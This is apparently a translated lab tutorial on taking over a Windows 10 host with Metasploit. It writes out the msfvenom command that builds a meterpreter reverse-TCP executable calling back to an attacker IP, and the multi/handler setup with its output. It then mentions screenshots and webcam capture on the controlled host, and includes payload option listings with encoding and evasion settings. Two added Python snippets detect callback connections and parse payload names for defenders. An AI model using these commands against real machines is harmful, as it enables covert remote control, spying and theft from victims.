Remote Control of a Target Host
Remote control program basics
A remote control program can be thought of as a framework for operating one device from another. It has two parts: the controlled side and the controlling side. The controlled side is the program that runs on the target host; it may be a piece of code or a directly executable program, and in meaning it is equivalent to a trojan. The controlling side runs on the attacker's machine.
Depending on how the controlling and controlled sides connect, remote control software can be divided into forward and reverse types.
Here we mainly introduce reverse control, which most remote control software uses. When the target host runs the controlled side, it notifies the source host: "I am under your control now, send me commands!" The attacker's machine therefore only needs to set the source IP address (its own) and port on which it waits for the target host to connect; it does not need to know the target host's IP address.
The controlled side is generated on the attacker's machine with the relevant tools, or it can be custom-written.
Hands-on: remote control of a target host
Environment: controlling side: Kali Linux 2020.1b
Controlled side: Win10
Virtual machines on bridged networking
Steps:
1. Generate the controlled side
Run the command:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.120 lport=5000 -f exe -o /root/payload.exe
Execution result: (screenshot)
This command uses a payload that ships with msfvenom (windows/meterpreter/reverse_tcp) to generate the controlled side; it specifies that the controlled side is an executable file and where to save it in Kali, and it sets the source IP address and port on which the controlling side waits for connections.
windows/meterpreter/reverse_tcp is really just code that can run directly on a computer (called a payload); this command only compiles it into the format we need.
After generating the controlled side, copy this executable file to the target host.
2. Start the controlling side in Kali Linux
(1) Start Metasploit
aaa@qq.com:/# msfconsole
Execution result: (screenshot)
(2) Start the handler module as the controlling side
msf5 > use exploit/multi/handler
(3) Set the payload matching the controlled side generated earlier, then wait for the controlled side to connect
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.43.120
lhost => 192.168.43.120
msf5 exploit(multi/handler) > set lport 5000
lport => 5000
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.43.120:5000
^C[-] Exploit failed [user-interrupt]: Interrupt
[-] exploit: Interrupted
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.43.120:5000
After running the last command, double-click payload.exe on the target host.
The commands above did not succeed; after changing the source port to 4444 it worked. The reason may be that the default port of the windows/meterpreter/reverse_tcp payload is 4444, as will be seen in the description below, and perhaps it cannot be changed.
Just change it again here; the command in the previous step does not need to be modified.
When the content shown in the red box on the last line appears, the controlled side has been taken over.
3. Operate the controlled host
Reference article: Detailed usage of the webcam and audio recording in meterpreter post-exploitation
Screenshot command: screenshot
View the camera list, open the camera and take a photo, ...
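From the defender's side, the property that makes reverse control convenient for the operator (the target initiates the outbound connection to LHOST:LPORT) is also what makes it visible on the host. The following is an added example, not code from the original post or from Metasploit: it scans a process-to-connection listing for outbound TCP connections that match the handler ports used in this lab (4444, the payload's default, and 5000) or that belong to a process not normally expected to hold outbound connections. The log lines, the column layout (a netstat-style listing with the process image appended), the process allow-list and all addresses are constructed for the illustration.

```python
"""Flag outbound connections that look like a reverse-TCP callback.

Added example (not part of the original post, not Metasploit code).
The log format below is an assumption: a netstat-style listing with
the owning process image name appended as the last column.
"""
import re
from collections import Counter, namedtuple

# Handler ports seen in this post: 4444 is the payload's documented
# default LPORT, 5000 was the port first tried (assumption: treat both
# as known handler ports worth alerting on).
SUSPECT_PORTS = {4444, 5000}

# Processes normally expected to hold outbound connections (assumption,
# a real deployment would build this list from its own baseline).
EXPECTED_OUTBOUND = {"chrome.exe", "msedge.exe", "svchost.exe", "onedrive.exe"}

# States that mean the local process is the one initiating the connection.
OUTBOUND_STATES = {"ESTABLISHED", "SYN_SENT"}

Conn = namedtuple("Conn", "proto local remote state pid image")

LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\d+)\s+(\S+)\s*$")

# Constructed sample listing: one payload.exe process calling back to the
# lab handler, plus ordinary browser and sync-client traffic on 443.
SAMPLE_LOG = """\
  TCP    192.168.43.77:49731    192.168.43.120:4444    ESTABLISHED    5124   payload.exe
  TCP    192.168.43.77:49702    142.250.72.14:443      ESTABLISHED    3312   chrome.exe
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING      912    svchost.exe
  TCP    192.168.43.77:49744    192.168.43.120:5000    SYN_SENT       5124   payload.exe
  TCP    192.168.43.77:49760    40.126.31.2:443        ESTABLISHED    2201   OneDrive.exe
""".splitlines()


def parse_line(line):
    """Parse one listing line into a Conn, or return None for non-matching lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    proto, local, remote, state, pid, image = m.groups()
    return Conn(proto, local, remote, state, int(pid), image)


def remote_port(conn):
    """Extract the numeric port from an address of the form host:port."""
    _, _, port = conn.remote.rpartition(":")
    return int(port)


def reasons_for(conn):
    """Return the indicators that make this connection look like a callback."""
    reasons = []
    if conn.proto != "TCP" or conn.state not in OUTBOUND_STATES:
        return reasons  # listeners and UDP are out of scope for this check
    port = remote_port(conn)
    if port in SUSPECT_PORTS:
        reasons.append(f"remote port {port} is a known handler port")
    if conn.image.lower() not in EXPECTED_OUTBOUND:
        reasons.append(f"process {conn.image} is not expected to hold outbound connections")
    return reasons


def scan(lines):
    """Return [(Conn, [reason, ...])] for every line with at least one indicator."""
    hits = []
    for line in lines:
        conn = parse_line(line)
        if conn is None:
            continue
        why = reasons_for(conn)
        if why:
            hits.append((conn, why))
    return hits


def attempts_by_pid(hits):
    """Count flagged connections per PID; repeated attempts from one PID match
    the stager's retry behaviour (StagerRetryCount in the options listing)."""
    return Counter(conn.pid for conn, _ in hits)


if __name__ == "__main__":
    for conn, why in scan(SAMPLE_LOG):
        print(f"pid {conn.pid} {conn.image} -> {conn.remote} [{conn.state}]: " + "; ".join(why))
    print("attempts per pid:", dict(attempts_by_pid(scan(SAMPLE_LOG))))
```

On a real host the listing would come from `netstat -ano` joined with a process list (or from an EDR's network events); the check is deliberately two-pronged so that changing the handler port alone does not silence it, and the per-PID count surfaces the retry loop a stager performs while the handler is down.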
Tool usage
msfvenom
This tool is mainly concerned with generating attack payloads. Use msfvenom -h to view the usage of all parameters; the parameter usage differs from that in other versions of Kali.
aaa@qq.com:/# msfvenom -h
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe
Options:
-l, --list <type> List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
-p, --payload <payload> Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
--list-options List --payload <value>'s standard, advanced and evasion options
-f, --format <format> Output format (use --list formats to list) (-f and --format have the same effect)
-e, --encoder <encoder> The encoder to use (use --list encoders to list)
--sec-name <value> The new section name to use when generating large Windows binaries. Default: random 4-character alpha string
--smallest Generate the smallest possible payload using all available encoders
--encrypt <value> The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)
--encrypt-key <value> A key to be used for --encrypt
--encrypt-iv <value> An initialization vector for --encrypt
-a, --arch <arch> The architecture to use for --payload and --encoders (use --list archs to list)
--platform <platform> The platform for --payload (use --list platforms to list)
-o, --out <path> Save the payload to a file
-b, --bad-chars <list> Characters to avoid example: '\x00\xff'
-n, --nopsled <length> Prepend a nopsled of [length] size on to the payload
--pad-nops Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)
-s, --space <length> The maximum size of the resulting payload
--encoder-space <length> The maximum size of the encoded payload (defaults to the -s value)
-i, --iterations <count> The number of times to encode the payload
-c, --add-code <path> Specify an additional win32 shellcode file to include
-x, --template <path> Specify a custom executable file to use as a template
-k, --keep Preserve the --template behaviour and inject the payload as a new thread
-v, --var-name <value> Specify a custom variable name to use for certain output formats
-t, --timeout <second> The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
-h, --help Show this message
The first sentence of the help text already tells us that this tool is a payload generator. In the example given in the help text, "/usr/bin/msfvenom" includes the full path; in practice it also works without the path.
1. List the options a payload needs to have set.
msfvenom -p windows/meterpreter/reverse_tcp --list-options
All parameters used in the command above can be found in the help text.
aaa@qq.com:/# msfvenom -p windows/meterpreter/reverse_tcp --list-options
Options for payload/windows/meterpreter/reverse_tcp:
=========================
Name: Windows Meterpreter (Reflective Injection), Reverse TCP Stager
Module: payload/windows/meterpreter/reverse_tcp
Platform: Windows
Arch: x86
Needs Admin: No
Total size: 283
Rank: Normal
Provided by:
skape <aaa@qq.com>
sf <aaa@qq.com>
OJ Reeves
hdm <aaa@qq.com>
Basic options: (basic option settings)
Name Current Setting Required Description (option name, default value, whether the option is required, and option description, respectively)
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Description:
Inject the meterpreter server DLL via the Reflective Dll Injection
payload (staged). Connect back to the attacker
Advanced options for payload/windows/meterpreter/reverse_tcp: (advanced option settings)
=========================
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySession true yes Automatically verify and drop invalid sessions
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableStageEncoding false no Encode the second stage payload
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PayloadBindPort no Port to bind reverse tcp socket to on target system.
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
PrependMigrate false yes Spawns and runs shellcode in new process
PrependMigrateProc no Process to spawn and run shellcode in
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Evasion options for payload/windows/meterpreter/reverse_tcp:
=========================
Name Current Setting Required Description
---- --------------- -------- -----------
The options marked in bold above are the ones we need to set; in the listing, LHOST is required and has no default, and LPORT defaults to 4444.
2. View the formats supported for generating the controlled side
aaa@qq.com:/# msfvenom -l formats
This command shows how the -l parameter is used: it lists a category of data, such as the supported formats (formats), payloads, and so on.
3. Payload naming rule:
windows/meterpreter/reverse_tcp is the name of this payload. It consists of three parts, separated by "/":
Target operating system | Control type (shell or meterpreter; the latter is the more capable) | Module name (indicates forward or reverse, and which network protocol is used)
windows | /meterpreter | /reverse_tcp
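The naming rule above is regular enough to parse mechanically, which is useful when, for example, a detection rule or an inventory script needs to know whether a payload name denotes a reverse (target calls out) or forward (bind, operator connects in) connection and over which protocol. The following is an added example, not Metasploit's own code: it splits a payload name into the three parts described above and derives the direction and protocol from the module name. As an assumption beyond the post's three-part description, it also accepts an optional architecture segment in second position (such as windows/x64/meterpreter/reverse_tcp); the post's own example has no such segment, and the listing above reports its architecture as x86.

```python
"""Parse a Metasploit payload name: platform[/arch]/stage/module.

Added example, not Metasploit code. The post describes the three-part
form platform/control-type/module; the optional arch segment is an
assumption added here.
"""
from dataclasses import dataclass
from typing import Optional

# Architecture segments this parser recognises in second position (assumption).
KNOWN_ARCHS = {"x86", "x64"}

# Module-name prefixes and the connection direction they denote, as the
# post describes: reverse = target connects back, bind = operator connects in.
DIRECTION_PREFIXES = {"reverse": "reverse", "bind": "forward"}


@dataclass(frozen=True)
class PayloadName:
    platform: str          # target operating system, e.g. windows
    arch: Optional[str]    # None when the name carries no arch segment
    stage: str             # control type, e.g. meterpreter or shell
    module: str            # e.g. reverse_tcp

    @property
    def direction(self) -> str:
        """'reverse' or 'forward' from the module-name prefix, else 'unknown'."""
        prefix, _, _ = self.module.partition("_")
        return DIRECTION_PREFIXES.get(prefix, "unknown")

    @property
    def protocol(self) -> str:
        """Transport named after the direction prefix, e.g. tcp, http, https."""
        _, _, proto = self.module.partition("_")
        return proto or "unknown"


def parse_payload_name(name: str) -> PayloadName:
    """Split a payload name on '/' into its parts; raise on unexpected shapes."""
    parts = name.strip("/").split("/")
    if len(parts) == 3:
        platform, stage, module = parts
        arch = None
    elif len(parts) == 4 and parts[1] in KNOWN_ARCHS:
        platform, arch, stage, module = parts
    else:
        raise ValueError(f"unexpected payload name shape: {name!r}")
    return PayloadName(platform, arch, stage, module)


def describe(name: str) -> str:
    """One-line human-readable summary, e.g. for an inventory report."""
    p = parse_payload_name(name)
    arch = p.arch or "module default"
    return (f"{p.platform} ({arch}) / {p.stage} / {p.module}: "
            f"{p.direction} connection over {p.protocol}")


if __name__ == "__main__":
    # The post's own payload, plus a bind variant to show the other direction.
    for n in ("windows/meterpreter/reverse_tcp", "windows/x64/meterpreter/bind_tcp"):
        print(describe(n))
```

Distinguishing reverse from forward matters for monitoring: a reverse payload shows up as an outbound connection from the target, while a bind payload shows up as a new listening port on it, so the two call for different host and network indicators.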
msfconsole
Reference articles: Related modules in Metasploit
Learning Metasploit (part 2): basic usage of msfconsole
Once the controlling side has connected to the controlled side, it opens a Meterpreter control session (Session). Next article: Using Meterpreter on Windows